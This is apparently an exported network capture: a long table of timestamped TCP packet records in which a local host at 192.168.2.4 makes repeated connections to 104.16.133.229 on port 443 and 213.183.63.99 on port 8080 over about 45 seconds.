Nov 27, 2023 10:13:09.900068998 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.900072098 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.900979996 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.901021004 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.901715040 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.901760101 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.901837111 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.901839972 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.949359894 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:10.189403057 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:10.189527035 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:10.189600945 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:10.189750910 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:10.189759970 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:10.189773083 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:10.189778090 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:10.190026045 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:10.403284073 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:10.450910091 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:13.404176950 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:13.606868029 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:13.620845079 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.620897055 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.620985031 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.621743917 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.621757030 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.653132915 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:13.856266022 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:13.877815008 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.878096104 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.878119946 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.878146887 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.878151894 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.879143953 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.879206896 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.880197048 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.880259037 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.880346060 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.880353928 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:13.927484989 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:13.983468056 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:13.983623028 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:14.063076019 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:14.169136047 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:14.169253111 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:14.169362068 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:14.169512033 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:14.169538021 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:14.169549942 CET	49757	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:14.169554949 CET	443	49757	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:14.169691086 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:14.377789974 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:14.425518990 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:17.382409096 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:17.585338116 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:17.591814041 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.591897964 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.592055082 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.592916012 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.592933893 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.640249014 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:17.848969936 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.849267960 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.849286079 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.849481106 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.849486113 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.850486040 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.850572109 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.851716042 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.851771116 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.851948023 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:17.851953030 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:17.899571896 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:18.138289928 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:18.138423920 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:18.138474941 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:18.138629913 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:18.138639927 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:18.138650894 CET	49758	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:18.138655901 CET	443	49758	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:18.139144897 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:18.348618984 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:18.396430016 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:21.552275896 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:21.754950047 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:21.768420935 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:21.768455029 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:21.768522978 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:21.768938065 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:21.768951893 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:21.800791979 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:22.023969889 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.024280071 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.024295092 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.024312973 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.024317026 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.025188923 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.025302887 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.026017904 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.026077986 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.026335955 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.026343107 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.073513985 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.317142963 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.317262888 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.317446947 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.317775965 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.317795038 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.317851067 CET	49759	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:22.317856073 CET	443	49759	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:22.318269968 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:22.526499987 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:22.574325085 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:25.527757883 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:25.730464935 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:25.734536886 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.734565020 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:25.734644890 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.735438108 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.735452890 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:25.782387018 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:25.993833065 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:25.994159937 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.994179010 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:25.994458914 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.994463921 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:25.995589018 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:25.995661020 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.996988058 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:25.997170925 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:26.001385927 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:26.049156904 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:26.049200058 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:26.097121954 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:26.293562889 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:26.293698072 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:26.293781996 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:26.294003963 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:26.294023037 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:26.294044018 CET	49760	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:26.294049978 CET	443	49760	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:26.294244051 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:26.502710104 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:26.550479889 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:29.066097975 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:29.192181110 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:29.192475080 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:29.274784088 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:29.505604982 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:29.708452940 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:29.722975016 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.723006010 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.723084927 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.723526955 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.723539114 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.755456924 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:29.976846933 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.977202892 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.977215052 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.977588892 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.977593899 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.978630066 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.978727102 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.981358051 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.981420994 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:29.981842041 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:29.981848955 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:30.029253006 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:30.265297890 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:30.265435934 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:30.265506983 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:30.265887022 CET	49761	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:30.265899897 CET	443	49761	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:30.266272068 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:30.473292112 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:30.521059990 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:33.474473953 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:33.677151918 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:33.687532902 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.687576056 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.687640905 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.688363075 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.688375950 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.720108032 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:33.942126036 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.942318916 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.942343950 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.942462921 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.942467928 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.943340063 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.943407059 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.944230080 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.944284916 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.944312096 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.985264063 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:33.991525888 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:33.991534948 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:34.039176941 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:34.234355927 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:34.234441996 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:34.234504938 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:34.234675884 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:34.234694958 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:34.234705925 CET	49762	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:34.234710932 CET	443	49762	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:34.234797001 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:34.445873022 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:34.493496895 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:37.446865082 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:37.654812098 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:37.661659002 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.661724091 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.661799908 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.662563086 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.662571907 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.694466114 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:37.926898956 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.927186012 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.927221060 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.927324057 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.927329063 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.928955078 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.929030895 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.930135965 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.930227995 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.931046009 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:37.978693008 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:37.978723049 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:38.025415897 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:38.216137886 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:38.216279030 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:38.216387033 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:38.216449976 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:38.216465950 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:38.216478109 CET	49763	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:38.216483116 CET	443	49763	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:38.216587067 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:38.426301003 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:38.473958969 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:41.427298069 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:41.629951954 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:41.635993958 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.636020899 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.636140108 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.636775017 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.636790037 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.684346914 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:41.891691923 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.891959906 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.891972065 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.892353058 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.892358065 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.893213034 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.893277884 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.894227028 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.894279957 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.894345999 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:41.894352913 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:41.941930056 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:42.187313080 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:42.187439919 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:42.187628031 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:42.187917948 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:42.187927008 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:42.187956095 CET	49764	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:42.187961102 CET	443	49764	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:42.188235044 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:42.398011923 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:42.445740938 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:44.289580107 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:44.447490931 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:44.447560072 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:44.496542931 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:45.399152994 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:45.602086067 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:45.607923031 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.607975006 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.608072042 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.608556986 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.608575106 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.656253099 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:45.870433092 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.870738029 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.870755911 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.870778084 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.870784044 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.871803045 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.871866941 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.872800112 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.872865915 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.872885942 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.913261890 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.920144081 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:45.920160055 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:45.967854023 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:46.173585892 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:46.173743010 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:46.173966885 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:46.174031019 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:46.174068928 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:46.174088001 CET	49765	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:46.174094915 CET	443	49765	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:46.174168110 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:46.382072926 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:46.430102110 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:49.383274078 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:49.586684942 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:49.591082096 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.591115952 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.591217041 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.591702938 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.591717005 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.638808012 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:49.846370935 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.846560955 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.846574068 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.846694946 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.846698999 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.847553015 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.847618103 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.848454952 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.848504066 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.848586082 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:49.848591089 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:49.895746946 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:50.138539076 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:50.138622046 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:50.138670921 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:50.138801098 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:50.138812065 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:50.138838053 CET	49766	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:50.138844013 CET	443	49766	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:50.138991117 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:50.345881939 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:50.393548012 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:54.216346025 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:54.419012070 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:54.432715893 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.432754040 CET	443	49767	104.16.133.229	192.168.2.4
